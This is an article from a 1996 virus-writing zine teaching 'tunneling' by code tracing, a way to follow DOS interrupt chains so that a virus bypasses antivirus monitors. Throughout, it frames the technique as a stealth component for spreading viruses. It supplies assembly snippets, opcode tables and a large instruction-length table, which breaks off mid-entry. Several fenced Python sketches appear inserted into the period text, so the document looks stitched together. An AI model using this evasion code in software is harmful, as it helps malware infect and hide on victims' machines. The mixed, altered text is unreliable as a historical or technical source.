Insane Reality issue #8 - (c)opyright 1996 Immortal Riot/Genesis - REALITY.011

Article: Code Tracing
Author: Methyl [IRG]

% Tunneling with Code Tracing by Methyl [IRG] %
_______________________________________________

Here's a great tutorial on Tunneling via Emulation by Methyl, one of IRG's
newest members. It should be noted that this article deals with the somewhat
complex issue of Code Emulation, not just lame INT 01h single-stepping. For
an example of an even more complex Code Emulator, you might want to see
Tracer, which is also included in IR zine #8. Example .ASM file, then Debug
Script, follow.

- _Sepultura_

=============================================================================

                  ┌───────────────────────────────────────┐
                  │               Tunneling               │
                  │                 with                  │
                  │             Code Tracing              │
                  └───────────────────────────────────────┘

┌──────────────┐
│ Introduction │
└──────────────┘

Welcome to the wonderful world of tunneling with code tracing. If you have
absolutely no idea what single step tunneling is (ie: you have not yet
reached the level of tunneling marsupial) then go back and read document one
in this series (which you can steal from http://www.ikx.org/xine). Heck, why
live as an amoeba, wiggling about in chemical soup devouring micro-organisms,
when you can be a fully grown marsupial, stealing crocodile eggs.

Anyway, as you'll remember, where we last left off, you had learnt about the
pitfalls of single step mode. To quickly recap: it can be detected by AV
software, it isn't compatible with some software out there such as DESQView,
and just generally, single stepping stinks :)

So, this is where code tracing comes in. Code tracing is important to learn,
because it'll open your eyes to all the possibilities of tunneling, proving
that there -IS- life after single step mode, and coding a code tracer will
help you in lots of other forms of tunneling too.
On top of this, it looks really cool, and well, "code tracing" sounds cool ;)
Best of all, it can't activate AV software anti-tunneling mechanisms, which
is going to be its main selling point throughout this document.

─────────────────────────────────────────────────────────────────────────────
 Section 1: Code tracing, the basics
─────────────────────────────────────────────────────────────────────────────

Code tracing was publicly 'invented' in September 1993, when a virus writer
called Khontark released his "Recursive Tunneling Toolkit". His code was
*VERY* compact, and hey, back then it worked. However, people in the VX
community generally rejected it, because of how easy it was to fool... and
yet, even today, it does a pretty good job of getting past AV software,
simply because even though it CAN be fooled, no-one has bothered to put in
actual code to fool it (hehehe, it can't tunnel through DESQView though).

Code tracing is pretty much a dead art, at least, it hasn't been revived much
since Khontark gave it a try. However, the problems of 1993's code tracers
can be easily fixed with enough coding ingenuity. Stability can be increased
past the expectations of even people who hate code tracers, with no
noticeable speed decrease (that is, less than half a second of extra tracing
time). The only problem is code space, but an extra 1k or so on your virus
won't do any harm, and things can *ALWAYS* be optimized...

So, it's time to tell you how code tracers actually work. To put it simply,
they try to follow the flow of execution in an interrupt chain, without
executing any of that code. They do this by looking at the opcodes that WOULD
execute if the interrupt was run, and checking if they are JMP/CALL
instructions, etc. If they are, they are followed and tracing continues.
This continues until the tracer hits the original interrupt entrypoint, which
it recognizes using the same methods as single step tunnelers.
That may sound a little hard to understand, but re-read it a few times and
it'll come to you. It's simple.

For example, say we point DS:SI to the entrypoint of an interrupt. Then, we
take the word of memory at that location and compare it against the opcodes
of the JMP and CALL instruction series. If there's a match, DS:SI is updated
and we continue tracing. If not, we look at the next memory location and
loop around again, checking the word of memory there. Of course, there are
problems with using this *EXACT* method of tracing, but you'll learn more
about them when we take a more in-depth look later on.

┌───────────┐
│ Overrides │
├───────────┴────────────────────────────────────────────────────────────┐
│ CS:               02eh        1 byte                                   │
│ DS:               03eh        1 byte                                   │
│ ES:               026h        1 byte                                   │
│ SS:               036h        1 byte                                   │
└────────────────────────────────────────────────────────────────────────┘

The first type of 'opcode' we should check against is the segment override.
You'll remember these happy little fellows from document one and the OPCODE
CHECK method of tunneling, and you'll remember that we need to recognize them
to correctly handle a following JMP or CALL that references memory (for
instance JMP FAR PTR CS:[ORIGINAL_13]).

Since we are not executing instructions, the only segment register whose
value we know for sure is CS. As such, if we encounter an instruction such
as the one above, but with another segment override, we have to abort, as we
don't know where to fetch the address we should flow to.
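
As a rough model of that check (written in Python purely so it can be run and
poked at; the real tracer would of course be assembly), the sketch below
splits an optional override byte off the front of an instruction and reports
whether a following memory reference could be followed. The function names
are made up for this illustration, and the rule "only CS: is usable" is taken
straight from the paragraph above.

```python
# Segment override prefix bytes, as listed in the Overrides table.
SEGMENT_OVERRIDES = {0x2E: "CS", 0x3E: "DS", 0x26: "ES", 0x36: "SS"}


def split_override(code: bytes, offset: int = 0):
    """Return (override_name_or_None, offset_of_the_opcode_itself)."""
    if offset >= len(code):
        raise IndexError("offset is past the end of the buffer")
    name = SEGMENT_OVERRIDES.get(code[offset])
    if name is None:
        return None, offset          # no prefix: opcode starts right here
    return name, offset + 1          # prefix found: opcode is the next byte


def operand_segment_known(code: bytes, offset: int = 0) -> bool:
    """True only when the memory operand is explicitly read through CS:.

    Without executing anything, CS is the only segment value the tracer
    knows, so any other (or missing) override means "abort the trace".
    """
    name, _ = split_override(code, offset)
    return name == "CS"


if __name__ == "__main__":
    # 2E FF 2E 34 12  =  JMP FAR CS:[1234h]
    print(split_override(bytes([0x2E, 0xFF, 0x2E, 0x34, 0x12])))
    # 26 FF 2E 34 12  =  JMP FAR ES:[1234h]  (cannot be followed)
    print(operand_segment_known(bytes([0x26, 0xFF, 0x2E, 0x34, 0x12])))
```

Returning the offset of the real opcode alongside the prefix name means the
caller can go on to compare that byte against the JMP/CALL tables without
re-scanning the prefix.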
┌─────┐
│ JMP │
├─────┴──────────────────────────────────────────────────────────────────┐
│ JMP SHORT         0ebh        2 bytes  mov al, [si+1]                  │
│                                        cbw                             │
│                                        add si, ax                      │
│                                        add si, 2                       │
│ JMP NEAR (immed)  0e9h        3 bytes  add si, [si+1]                  │
│                                        add si, 3                       │
│ JMP NEAR (mem)    0ffh, 026h  4 bytes  mov si, [si+2]                  │
│                                        mov si, [si]                    │
│ JMP FAR (immed)   0eah        5 bytes  mov ax, [si+3]                  │
│                                        mov si, [si+1]                  │
│                                        mov ds, ax                      │
│ JMP FAR (mem)     0ffh, 02eh  4 bytes  mov si, [si+2]                  │
│                                        mov ax, [si+2]                  │
│                                        mov si, [si]                    │
│                                        mov ds, ax                      │
└────────────────────────────────────────────────────────────────────────┘

JMP instructions are pretty easy to handle (from here on the instruction
tables include code, so you can see what happens if DS:SI is our pointer and
it is pointing at the JMP). The immediate forms of JMP SHORT and JMP NEAR
give you a displacement, which you simply add to SI along with the length of
the instruction. JMP FAR, and JMP NEAR with a memory operand, instead give
you a completely new [DS:]SI. Note that this is only EXAMPLE code; we will
actually handle JMP SHORTs differently in our final tracer, for reasons
you'll discover later.
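
The displacement arithmetic for the two relative jumps can be modelled in a
few lines. This is only a sketch in Python (chosen so it can be run as-is),
with `jmp_target` and `sign_extend8` being names invented here; it mirrors
the CBW / ADD SI sequences in the table, including the 16-bit wrap-around
that ADD SI gives you for free.

```python
def sign_extend8(value: int) -> int:
    """Python stand-in for CBW: treat a byte as a signed 8-bit number."""
    return value - 0x100 if value & 0x80 else value


def jmp_target(code: bytes, ip: int) -> int:
    """Return the offset a relative JMP at code[ip] transfers control to."""
    opcode = code[ip]
    if opcode == 0xEB:                       # JMP SHORT: 8-bit displacement
        disp = sign_extend8(code[ip + 1])
        return (ip + 2 + disp) & 0xFFFF      # relative to the next instruction
    if opcode == 0xE9:                       # JMP NEAR: 16-bit displacement
        disp = code[ip + 1] | (code[ip + 2] << 8)
        return (ip + 3 + disp) & 0xFFFF      # wraps inside the 64K segment
    raise ValueError("not a relative JMP: %02Xh" % opcode)


if __name__ == "__main__":
    print(hex(jmp_target(bytes([0xEB, 0x05]), 0)))        # forward short jump
    print(hex(jmp_target(bytes([0xEB, 0xFE]), 0)))        # JMP $ (jumps to itself)
    print(hex(jmp_target(bytes([0xE9, 0x10, 0x00]), 0)))  # forward near jump
```

Masking with 0FFFFh matters for backward near jumps, whose displacement is
stored as a large unsigned word.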
┌──────┐
│ CALL │
├──────┴─────────────────────────────────────────────────────────────────┐
│ CALL NEAR (immed) 0e8h        3 bytes  mov ax, si                      │
│                                        add ax, 3                       │
│                                        push ax                         │
│                                        add si, [si+1]                  │
│                                        add si, 3                       │
│ CALL NEAR (mem)   0ffh, 016h  4 bytes  mov ax, si                      │
│                                        add ax, 4                       │
│                                        push ax                         │
│                                        mov si, [si+2]                  │
│                                        mov si, [si]                    │
│ CALL FAR (immed)  09ah        5 bytes  mov ax, si                      │
│                                        add ax, 5                       │
│                                        push ds                         │
│                                        push ax                         │
│                                        mov ax, [si+3]                  │
│                                        mov si, [si+1]                  │
│                                        mov ds, ax                      │
│ CALL FAR (mem)    0ffh, 01eh  4 bytes  mov ax, si                      │
│                                        add ax, 4                       │
│                                        push ds                         │
│                                        push ax                         │
│                                        mov si, [si+2]                  │
│                                        mov ax, [si+2]                  │
│                                        mov si, [si]                    │
│                                        mov ds, ax                      │
└────────────────────────────────────────────────────────────────────────┘

CALL instructions are handled just like their corresponding JMP
instructions, except that we save the address of the next instruction onto
the stack, so that when we also emulate RET instructions, we can fully trace
the flow of execution. Once again, this is example code for an extremely
simple tracer, which we will not be using.

┌─────┐
│ RET │
├─────┴──────────────────────────────────────────────────────────────────┐
│ IRET              0cfh        1 byte   pop si                          │
│                                        pop ds                          │
│ RET NEAR          0c3h        1 byte   pop si                          │
│ RET FAR           0cbh        1 byte   pop si                          │
│                                        pop ds                          │
│ RET NEAR (immed)  0c2h        3 bytes  pop si                          │
│ RET FAR (immed)   0cah        3 bytes  pop si                          │
│                                        pop ds                          │
└────────────────────────────────────────────────────────────────────────┘

The RET family is pretty easy to handle; the only things you really need to
look out for are the RETs with pop values, and IRET. Since a copy of the
flags will never be pushed onto the stack (because we don't emulate
PUSHF/POPF, there is no need as we never know the status of the flags
register), we don't try to pop this value off. Usually the RET instructions
with pop values simply use the pop value field to get rid of parameters
passed to a routine, or to skip popping the flags off of the stack if an
interrupt was executed/emulated.
Since nothing other than DS:SI is ever on our stack, we just treat the pop
values as 0, otherwise we get into complications.

─────────────────────────────────────────────────────────────────────────────
 Section 2: Keeping our code tracer healthy
─────────────────────────────────────────────────────────────────────────────

One of the major problems with Khontark's code tracer was its ability to
hang the machine. Obviously, a virus which hangs a computer whenever an
infected file is executed will not propagate very far, and is likely to
arouse great suspicion. However, Khontark can't really be blamed, as he was
aiming for fast speed and low space. Anyway, there are lots of things you
need to deal with to stop your computer from hanging.

┌───────────┐
│ The quirk │
└───────────┘

We'll start off with the simple stuff. In INTEL CPUs (and maybe other
clones, I'm not sure), there is a really strange quirk we need to watch out
for. If we ever read a WORD value from the last BYTE of a segment, what do
you think would happen? At first, you may think we'd get the last byte of
the segment as half of the word, and the other half of the word from the
first byte of the segment. That wrap-around is what the original 8086/8088
does, but it does *NOT* happen on a 286 or later: there the read runs past
the segment limit and raises exception 0Dh, so our computer hangs and memory
managers go crazy with exception errors. So much for being stealthy if every
program that is infected causes problems for the computer :)

So, what can we do? Well, we make sure we don't read a word from the end of
a segment! Alternatively, we can simply check our fake IP for a value of
about 0FFF8h or above, and abort if that is the case. This isn't too bad an
idea, and it takes up much less code than checking EVERY read from memory
for an end-of-segment value. It would be really rare to have an instruction
in the last few bytes of a segment, so we shouldn't worry too much about
incompatibility.
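
The "check the fake IP once" idea boils down to a single comparison. Here is
a minimal sketch of it in Python (again only a model of the logic, not tracer
code); the constant name, the helper names and the choice of raising an
exception to signal "abort the trace" are all assumptions made for this
example, and 0FFF8h is simply the ballpark figure mentioned above.

```python
SEGMENT_GUARD = 0xFFF8   # assumed cut-off: refuse to decode at or above this


def safe_to_read_word(ip: int, guard: int = SEGMENT_GUARD) -> bool:
    """True when an instruction starting at ip is well clear of offset FFFFh."""
    return 0 <= ip < guard


def read_word(segment: bytes, ip: int) -> int:
    """Fetch a little-endian word, aborting instead of touching the segment end."""
    if not safe_to_read_word(ip):
        raise ValueError("abort trace: fake IP too close to the end of segment")
    return segment[ip] | (segment[ip + 1] << 8)


if __name__ == "__main__":
    image = bytearray(0x10000)           # one empty 64K segment
    image[0x0100:0x0102] = b"\x34\x12"   # plant a word at offset 100h
    print(hex(read_word(bytes(image), 0x0100)))
```

Because the guard sits eight bytes below the end of the segment, even the
longest instruction handled in this document fits entirely inside the
segment when the check passes.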
┌───────────────────────────────────────┐
│ Proper care and feeding of your stack │
└───────────────────────────────────────┘

The stack is just like any other animal, if you overfeed it, it dies...
starve it, and it dies as well. Most of all, if the stack dies, just like an
animal, the rotting corpse is likely to arouse suspicion in your
neighbourhood ;) So, now you need to learn about the proper care and feeding
of your stack.

First, we need to make sure we don't feed it too much. To do this, we need
to get to know the stack you'll be working with. In a .COM file, the stack
is in the same segment as your code and grows downwards. In an .EXE file,
the stack can either be the same as in a .COM file, or, alternatively, it
can reside in another segment and grow down from the starting SP to 0.

So, we simply save the lowest possible value which we can allow the stack to
grow down to (the most we can feed it without killing it), and on each PUSH
we do in our code, we make sure we don't go past that value. However, say a
friendly neighbour next door is feeding our stack (animal) some scraps every
now and again: we may overfeed it, and the stack dies. So, be sure to keep a
little extra space free for unexpected feedings (hardware interrupts, etc,
etc) during your trace. An allowance of 20 words (snacks) or so will suffice.

Now, we have to make sure we don't starve our stack to death :) This means
we save our SP on entry to the tracer, and if we ever POP values past that
point, we know something went wrong, and we abort the tracing. That isn't
too hard, is it? On top of this, if we find an error during our tracing, we
can restore our SP value on exit, so as to not screw our stack up with all
the values we used in our tracing code (think of it as bringing our animal
back to life with magic after someone overfeeds it).

┌─────────────┐
│ Termination │
└─────────────┘

Now, we need to know how we can terminate our tracer.
Of course, we can use segment checks, etc, like you learnt about in document
one... however, what if something goes wrong and we never end up reaching
the original entrypoint, what would we do then? Luckily, due to the way we
are keeping our stack nice and healthy, it can be good to us, like a healthy
dog catching a stick you throw for it.

When we start up our tracer, we push two fake values onto the stack, as if
we were calling the interrupt itself (the values themselves don't matter,
and we do not need a 3rd value for the flags, as these are never used by our
normal IRET/RETF code anyway). Then, if our code ever pops these two values
off of the stack, we know we've properly exited the interrupt, and although
we might not have found our entrypoint (we MIGHT have found it if we were
using the OPCODE CHECK method of finding it, etc), we have exited the
tracing code with no errors, a good sign. At least we didn't hang!

─────────────────────────────────────────────────────────────────────────────
 Section 3: Dealing with the 'other' opcodes
─────────────────────────────────────────────────────────────────────────────

You'll notice that I didn't mention what we do if our current opcode ISN'T
one of the 'important' ones I listed above. Well, the reason is that there
are two ways you can go about handling these opcodes, and the discussion is
large enough and comprehensive enough to deserve its own section.

The usual method of handling unknown opcodes is to simply increment SI and
look at the next value, and keep going until we find an opcode we're looking
for. However, this is exactly where Khontark's tunneler went wrong, because
with such a strategy, this is what happens.

Remembering that JMP FAR with an immediate operand has the opcode 0eah (from
the tables I gave you in section 1), and taking my word that MOV BX,
word-immediate is 0bbh, we can create a hypothetical instruction such as the
one below.

        Instruction             Opcode
        ───────────             ──────
        MOV BX, 000EAH          0bbh, 0eah, 00

So, basically, say this is the start of the interrupt handler, and the first
thing for the tracer to see is '0bbh'. It doesn't understand this opcode, so
it goes onto the next byte, '0eah', which it sees as a FAR JMP with an
immediate operand. This is *NOT* good, because then our tracer takes the
next 2 words as its new offset:segment value, and blam, we've been screwed
into tracing into unknown memory. From here, all sorts of things can go
wrong, and quite possibly the computer will hang without the proper
precautions that I presented in section 2.

It was for reasons such as this that Khontark's tunneler was disliked.
However, the reason he didn't fix this up is sheer code size. Think, for
example, of somehow storing all the INTEL opcodes in a big table, each with
its corresponding size. To be blunt, all the instructions INTEL made up have
either a one byte or one word opcode, followed by various lengths of data
bytes depending on the actual value of the opcode. Okay, well, let's just
say we set up a table of every word opcode INTEL could use, with a length
byte following. Let's do some maths!

        Possible number of opcodes:             10000h
        Number of bytes per table entry:            3 bytes
                                                ──────
                                                30000h bytes

Yes, just for their word opcodes, we need roughly 200 decimal kilobytes
(192K, to be exact) to hold this table. Of course INTEL hasn't used *EVERY*
possible combination of opcode! However, there's no way of knowing which
opcodes it has/hasn't used, and even if we did, heck, that's still going to
be a motherfucker of a table to type out and test.

So, what alternatives do we have? Well, I'm not sure this is *THE* best way,
but I worked out something called the 'Complex Mask Tables', (c)1996 Methyl
aka The Pirate Prince :) How can a complex mask table help us?
Well, whereas our previous table would have been 200k at MOST, and a HELL of
a lot of typing, our complex mask table compresses this down to less than
300 bytes and involves a lot less typing (especially since I'll give you a
fully complete example table) :)

Before we go into diagrams and examples of a complex mask table, first you
must understand the idea behind it. INTEL wasn't so dumb as to randomly
select numbers for every type of instruction out there; it followed general
rules in describing most of its instruction set. Usually, one byte opcodes
which complement each other, such as STI and CLI, have only 1 bit that
differs between the two. Also, word instructions are set out in a complex
format, which we'll quickly gloss over here.

In a word opcode (usually), we have our first byte and our second byte. The
first byte usually determines the instruction itself, and the size of the
register to be used, or the data length to access if a memory operand is
given. Meanwhile, the second byte has information on whether we are
accessing registers or memory, how we are accessing this data, etc, etc,
etc. Between common word instructions, the format of the second byte stays
constant, with slight variations in the bitfields of the first byte. Also,
we can work out the length of an instruction from the information in the
second byte.

So, if we can 'group' instructions together by leaving out the bits which
change between them, we can then set up an algorithm to work out our
instruction length from the second byte, and our table is suddenly smaller.
If this isn't clear yet, read on, because it's easier to understand when you
see it in action.

─────────────────────────────────────────────────────────────────────────────

 Layout of a table entry:

        Size            Description
        ────            ───────────
        byte            field descriptor byte
        byte/word       MASK value

        byte            length encoding information  ┐ repeat
        var.            CMP value                    │ until no CMP
        var.            CMP value or doesn't exist   ┘ values left

 Field descriptor byte:

        │7│6│x│x│3│2│1│0│
         │ │ └┬┘ └──┬──┘
         │ │  │     └───── Total number of CMP values to process
         │ │  └─────────── Not used, so available for storing info should
         │ │               you expand my table definition
         │ └────────────── FIXUP: 0=No fixup necessary
         │                        1=FIXUP needed
         └──────────────── 0=Opcode prefix is byte
                           1=Opcode prefix is word

 Length encoding information:

        │7│6│5│4│3│2│1│0│
        │   2   │   1   │
        └───┬───┴───┬───┘
            └───────┴───── Grouped into nibbles, each describing the total
                           length of the instruction should the 1st or 2nd
                           CMP value of the pair match. Although only 3
                           bits are ever actually needed for this value,
                           less decoding is needed with whole nibbles such
                           as this.

─────────────────────────────────────────────────────────────────────────────

Okay, so you just saw the layout of my complex mask table. Of course, you
could make your own format up, but this should do you and me for a very long
time. It's best not to fret anyway, we'll have to completely redesign the
thing from scratch in document four (maybe) :)

Anyway, as you can see, we set up a table of entries, each laid out as in
the diagrams above. Our entry begins with a field descriptor byte, which
tells our table decoder (which is tracing an opcode value through our table)
what it needs to know to decode the fields. First, it tells whether the MASK
and CMP values are bytes or words, and as such, whether we are testing for a
byte or word opcode in this entry (it is not known beforehand whether the
value you have is a word or byte opcode, so you load up a word to trace and
go through the table until either a byte or word match is found). Next is
the FIXUP bit, which is used to fix up a strange quirk in many of INTEL's
instructions that makes them incompatible with complex mask tables.
Finally, we have 2 spare bits for you to store extra info in should you
choose to extend my table, and the last four bits tell our decoder how many
CMP values we will be processing.

Now that we know the layout of the rest of our entry, our decoder ANDs the
opcode it is testing against the next field, the MASK, which is a byte or
word depending on the information it gets from the field descriptor byte.
This masks off the bits that differ between instructions with similar
layouts but just a few stray bits between them.

After this, the count of CMP values we have in our field descriptor byte
comes into play. The rest of our entry is filled with a repetition of a
length encoding byte followed by one or two CMP values, until there are no
more CMP values left. For example, here is the layout of 3 entries, with 1,
3, and 6 CMP fields respectively:

        1 CMP           3 CMPs          6 CMPs
        ─────           ──────          ──────
        length          length          length
        cmp             cmp             cmp
                        cmp             cmp
                        length          length
                        cmp             cmp
                                        cmp
                                        length
                                        cmp
                                        cmp

You get the idea. Now, when our decoder has finished ANDing the stray bits
off of the opcode, it compares the resultant opcode with the current CMP
value. If a match occurs, it gets the total instruction length from the data
encoded in the length encoding information byte. If the first CMP value of a
pair matches, the length is in bits 3-0; if the second CMP value matches, it
is in bits 7-4. Each 2 CMPs have their own length encoding information byte.

Well, I think it's time for an example. For our example entry, we'll use a
fairly complex instruction... INC (increment). Increment comes in two forms,
INC [register] and INC [register/memory].

INC [register] is a one byte long opcode and its format is as follows. The
bit layout is '001000xxx', where xxx is a value depending on which register
we are going to increment. Each register (AX, BX, etc) has its own 3 bit
value which we could plug in here should we want to.
This means, in a one-byte simple table format (instruction value:length),
we'd be set out like this:

        db 001000000xb, 1
        db 001000001xb, 1
        db 001000010xb, 1
        db 001000011xb, 1
        db 001000100xb, 1
        db 001000101xb, 1
        db 001000110xb, 1
        db 001000111xb, 1

That's 16 bytes wasted on ONE relatively simple implementation of ONE
instruction. However, we're not here to complain about how my format is
better, we're here to teach you how to set up an entry, so here we go.

First, we need to begin setting up our field descriptor byte. So far, we
know we're a byte opcode, with no FIXUP, and the number of CMPs we need is
(so far, to you) unknown. Then, we need our mask value, which will be a byte
long. Since we need to cover ALL types of this instruction, we mask off the
unimportant bits. How do we do this?

            001000???xb
        AND 011111000xb
            ───────────
            001000000xb

Blam, we've eliminated all the unimportant bits, and are left with only one
value no matter which register we use with INC. This means we have one CMP
value, which we now know is 001000000xb, and we set our number of CMPs in
the field descriptor byte to 1. Now, we know the length of our instruction
will always be one byte, so our length encoding information is set to
'000000001xb' (the upper 4 bits don't matter at all, since they won't be
used when we have only one CMP value). We are left with our table entry as
this:

        db 000000001xb
            ││   └──────> 1 CMP value
            │└──────────> No fixup needed
            └───────────> Byte opcode
        db 011111000xb ───> ANDs out register bits
        db 000000001xb ───> if - 1st CMP match : total length is 1 byte
                               - 2nd CMP match : NULL (no 2nd CMP)
        db 001000000xb ───> Our CMP value

And that's our entry FINISHED!

However, we have a second example, the INC [register/memory] variant. This
is quite a bit more complex than our previous example, but you're so smart
I'm sure you'll get it in a snap.
This variant of INC has a 2 byte opcode, and is set out as follows:

        01111111Wxb, 0XX000ZZZxb

The first 7 bits are always constant, and the last bit of the first byte (W)
is 0 if the register or memory location to be incremented is a byte, or 1 if
it is a word. XX and ZZZ have special meaning though. XX (for this example)
varies the total instruction length as follows:

        00 = 2 bytes
        01 = 3 bytes
        10 = 4 bytes
        11 = 2 bytes

However! If XX=00 AND ZZZ=110, then our total instruction length will be 4
bytes long! Why? Well, it's not worth getting into right now (that
combination means a direct 16-bit memory address follows the opcode), just
know that this happens. For all the other XX values, ZZZ doesn't matter at
all.

This is the reason we have the FIXUP bit. If our instruction is set out like
INC, we set the FIXUP bit, and when our decoder decodes our table entry, it
will add a check so that if XX=00 and ZZZ=110, the proper modification to
the instruction length is made. Why is it like this? Well, if we DON'T add
this, then we can't mask off the ZZZ field, which we *REALLY* need to do,
otherwise our table size will bloat to many kilobytes.

Back to setting up our table entry :) We have a word long opcode, which
needs fixup, with unknown CMP values. We also know we need to mask out the
'w' bit, as it won't affect instruction length, and that we need the last 3
bits of 'xx000zzz' to be destroyed (as our decoder will handle the XX=00
ZZZ=110 exception). Also, we know we have 4 variations of XX, and therefore
4 CMP values to compare, so we can finish off our field descriptor byte, CMP
values, and length encoding bytes.
Here's our end table entry:

        db 011000100xb
            ││   └──────> 4 CMP values
            │└──────────> FIXUP needed
            └───────────> Word opcode
        db 011111110xb, 011111000xb
                └───────> ANDs out 'w' and 'zzz' bits
        db 000110010xb ───> if - 1st CMP match : total length is 2 bytes
                               - 2nd CMP match : total length is 3 bytes
        db 011111110xb, 000000000xb
                └───────> CMP value 1 (xx = 00)
        db 011111110xb, 001000000xb
                └───────> CMP value 2 (xx = 01)
        db 000100100xb ───> if - 3rd CMP match : total length is 4 bytes
                               - 4th CMP match : total length is 2 bytes
        db 011111110xb, 010000000xb
                └───────> CMP value 3 (xx = 10)
        db 011111110xb, 011000000xb
                └───────> CMP value 4 (xx = 11)

Phew! Now that's over, it's time to look at space savings. In a simple table
format we take up 378 bytes, and in our complex mask table format we take up
13 bytes :) Pretty neat huh? But that's not all!!! We can save EIGHT times
as much as this by using this VERY SAME entry size! Keep reading!

Think back to the layout of the bitfields in our INC instruction, which are
'01111111wxb, 0xx000zzzxb', and take a close look at the 000 in the second
byte. Well, INTEL was very smart in combining lots of its instructions into
this very same format, except the 000 is 001 and 010 etc. With a bit of
quick math, you'll work out there are 8 such instructions, 1 of which is
INC. So, if we can mask out these bits, we'll have the same 13 byte entry,
instead of a corresponding 3024 byte entry in simple table format, and it
will handle 8 different instructions!!! How do we do this? Look at the new
table entry below:

        db 011000100xb
        db 011111110xb, 011000000xb
                └───────> ANDs out 'w', '000' and 'zzz' bits
        db 000110010xb
        db 011111110xb, 000000000xb
        db 011111110xb, 001000000xb
        db 000100100xb
        db 011111110xb, 010000000xb
        db 011111110xb, 011000000xb

Done!
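
To see an entry like this being walked, here is a small model of the lookup
in Python (used only so the logic can be run and checked; it is not the
assembly decoder). `ENTRY` holds the 13 bytes of the combined INC-group
entry, with the CMP values for xx = 10 and xx = 11 taken from the matching
entries in the complete table in section 4. The function name and the
choice of returning `None` on "no match" are assumptions made for this
sketch.

```python
# The 13-byte entry for the FEh/FFh group, laid out as described above.
ENTRY = bytes([
    0b11000100,              # descriptor: word opcode, FIXUP, 4 CMP values
    0b11111110, 0b11000000,  # MASK: drop 'w', the middle 3 bits and 'zzz'
    0b00110010,              # lengths: 1st CMP -> 2, 2nd CMP -> 3
    0b11111110, 0b00000000,  # CMP 1 (xx = 00)
    0b11111110, 0b01000000,  # CMP 2 (xx = 01)
    0b00100100,              # lengths: 3rd CMP -> 4, 4th CMP -> 2
    0b11111110, 0b10000000,  # CMP 3 (xx = 10)
    0b11111110, 0b11000000,  # CMP 4 (xx = 11)
])


def match_entry(entry: bytes, op1: int, op2: int):
    """Return the instruction length if (op1, op2) matches entry, else None."""
    descriptor = entry[0]
    width = 2 if descriptor & 0x80 else 1     # word or byte MASK/CMP values
    needs_fixup = bool(descriptor & 0x40)
    count = descriptor & 0x0F                 # number of CMP values
    pos = 1
    mask = entry[pos:pos + width]
    pos += width
    # zip() stops at the MASK width, so a byte entry ignores op2.
    masked = bytes(b & m for b, m in zip((op1, op2), mask))
    lengths = 0
    for i in range(count):
        if i % 2 == 0:                        # every pair starts with lengths
            lengths = entry[pos]
            pos += 1
        cmp_value = entry[pos:pos + width]
        pos += width
        if masked == cmp_value:
            length = (lengths & 0x0F) if i % 2 == 0 else (lengths >> 4)
            # FIXUP: xx=00 with zzz=110 carries a 2-byte direct address.
            if needs_fixup and (op2 & 0b11000111) == 0b00000110:
                length += 2
            return length
    return None


if __name__ == "__main__":
    print(match_entry(ENTRY, 0xFE, 0xC0))   # INC AL
    print(match_entry(ENTRY, 0xFF, 0x47))   # INC WORD PTR [BX+disp8]
    print(match_entry(ENTRY, 0xFF, 0x06))   # INC WORD PTR [addr16]
```

Keeping the FIXUP test on the unmasked second byte is what lets the MASK
throw the zzz bits away without losing the one case where they matter.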
This is how we can save OODLES of space in our table entries, allowing us to
set up lengths for every instruction in INTEL's set without having to worry
too much about a 200k big table :) INTEL has littered 'common' instructions
like this all through its instruction set, and so the space savings are up
to you and how well you can write MASK values.

Of course, complex mask tables aren't the ONLY way of doing things! However,
it is all I've been able to think of :) Of course, I may not be the best at
combining MASK values, but I've done pretty well. Also, we've succeeded in
creating a viable method for handling stray opcodes other than incrementing
the instruction pointer by 1, and spending further time to shave off 30 or
so bytes isn't really worth the effort. Maybe you can work out something
better than a complex mask table, or make a more compact definition, or even
use a totally different concept altogether, but until then...

Anyway, you've just taken a walk through the concept of complex mask tables,
and I hope you enjoyed it :) To save you all the time and frustration of
fitting all of INTEL's set into my table format, I've already done it all
for you! MAYBE I have one or two bits wrong throughout the whole table, but
I've tested it out a few times and as far as I can see nothing is wrong with
it :) Anyway, we end up with a table size of 253 bytes, a MASSIVE saving on
200k :) Woo! Time to see the fruits of our (my) labour, don't you think?

─────────────────────────────────────────────────────────────────────────────
 Section 4: (8086/8088) COMPLETE Complex Mask Table!
─────────────────────────────────────────────────────────────────────────────

instruction_table_start:
        db 000000001xb
        db 011110000xb
        db 000000001xb
        db 010010000xb          ; CBW/CWD/POPF/PUSHF/SAHF/WAIT/CWDE/LAHF
                                ; XCHG [reg, accumulator]

        db 000000001xb
        db 011110110xb
        db 000000001xb
        db 011110100xb          ; CLD/STD/CMC/HLT

        db 000000011xb
        db 011111100xb
        db 000100001xb
        db 011111000xb          ; CLC/STC/CLI/STI
        db 011100000xb          ; LOOP[N]E/JCXZ
        db 000000001xb
        db 011110000xb          ; REP[NE]/LOCK

        db 000000001xb
        db 011110100xb
        db 000100001xb
        db 010100100xb          ; CMPS[B|W]/MOVS[B|W]/LODS[B|W]/SCAS[B|W]

        db 000000001xb
        db 011100000xb
        db 000000001xb
        db 001000000xb          ; [DEC|INC|PUSH|POP] register

        db 000000001xb
        db 011000110xb
        db 000000001xb
        db 000000110xb          ; AAA/AAS/DAA/DAS
                                ; PUSH/POP [segment register]

        db 000000001xb
        db 011111000xb
        db 000000001xb
        db 010010000xb          ; XCHG [register, accumulator] / NOP

        db 000000001xb
        db 011111110xb
        db 000000010xb
        db 011010100xb          ; AAD/AAM [including weird format]

        db 000000001xb
        db 011111110xb
        db 000000001xb
        db 001100000xb          ; [PUSH|POP]A

        db 000000001xb
        db 011111110xb
        db 000000001xb
        db 010011100xb          ; [POPF|PUSHF]

        db 000000010xb
        db 011111100xb
        db 000100001xb
        db 011101100xb
        db 011100100xb          ; [IN|OUT] variable port|fixed port

        db 000000010xb
        db 011111101xb
        db 000010010xb
        db 011001101xb
        db 011001100xb          ; IRET|INT [variable|3|overflow]

        db 000000001xb
        db 011111110xb
        db 000000001xb
        db 010101010xb          ; STOS[B|W]

        db 000000001xb
        db 011111111xb
        db 000000001xb
        db 011010111xb          ; XLAT

        db 011000100xb
        db 011111000xb, 011000000xb
        db 000110010xb
        db 011011000xb, 000000000xb
        db 011011000xb, 001000000xb
        db 000100100xb
        db 011011000xb, 010000000xb
        db 011011000xb, 011000000xb     ; ESC

        db 011000100xb
        db 011111110xb, 011000000xb
        db 000110010xb
        db 011000100xb, 000000000xb
        db 011000100xb, 001000000xb
        db 000100100xb
        db 011000100xb, 010000000xb
        db 011000100xb, 011000000xb     ; LDS/LES

        db 011000100xb
        db 011111100xb, 011000000xb
        db 000110010xb
